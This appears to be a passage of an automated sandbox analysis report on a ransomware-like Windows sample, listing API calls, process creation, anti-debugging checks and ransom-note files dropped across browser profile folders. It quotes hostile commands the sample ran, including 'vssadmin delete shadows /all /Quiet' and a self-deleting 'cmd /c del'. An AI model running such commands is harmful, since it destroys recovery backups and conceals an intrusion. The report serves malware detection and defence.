Source: C:\Users\user\AppData\Roaming\svcmtr.exeAPI call chain: ExitProcess graph end nodegraph_2-21940
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004258E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004258E7
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0042CCB4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042CCB4
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00413D10 wcsstr,_memset,GetFileAttributesW,SetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,CloseHandle,_memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,CloseHandle,SetFilePointer,WriteFile,WriteFile,GetProcessHeap,HeapFree,HeapFree,WriteFile,WriteFile,GetProcessHeap,HeapFree,HeapFree,FlushFileBuffers,CloseHandle,MoveFileExW,GetLastError,DeleteFileW,Sleep,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,0_2_00413D10
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0042A9AE SetUnhandledExceptionFilter,0_2_0042A9AE
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00423EBB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00423EBB
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004258E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004258E7
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0042A9AE SetUnhandledExceptionFilter,2_2_0042A9AE
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_00423EBB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00423EBB
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe C:\Users\user\AppData\Roaming\svcmtr.exe
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041D4D0 LoadStringW,LoadStringW,LoadStringW,CoInitializeEx,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,CoCreateInstance,CoCreateInstance,ExitProcess,_memset,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,CreateMutexW,GetLastError,_memset,GetVersionExW,CreateThread,CreateThread,_memset,__wfopen_s,_fprintf,CreateThread,CreateThread,CreateThread,SetThreadPriority,WaitForSingleObject,WaitForSingleObject,_memset,ShellExecuteW,ShellExecuteW,ShellExecuteW,ShellExecuteW,CreateThread,WaitForSingleObject,CreateThread,WaitForSingleObject,0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_003B17FB cpuid 0_2_003B17FB
Source: C:\Users\user\AppData\Roaming\svcmtr.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt VolumeInformation
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0042AE84 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0042AE84
Source: C:\Users\user\Desktop\0t8amSU3vd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\safebrowsing\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile written: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\safebrowsing\restore_files_gpmus.html

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery NULL
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\BudgetDatabase\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ECSerivceProvidersConfig\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\2986\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ThirdPartyModuleList64\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\js\index-dir\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.47.0\LICENSE.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\1.0.6.0\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\8167\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\AutofillStrikeDatabase\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\2986\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\blob_storage\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetrics\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\TLSDeprecationConfig\4\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\2986\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCache\GPUCache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\BudgetDatabase\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\0.57.44.2492\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ECSerivceProvidersConfig\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\Encryption\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\1.0.6.0\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\TLSDeprecationConfig\4\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\61\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\InterventionPolicyDatabase\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\chrome_shutdown_ms.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Storage\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\8167\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\BudgetDatabase\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetrics\restore_files_gpmus.txtJump to behavior
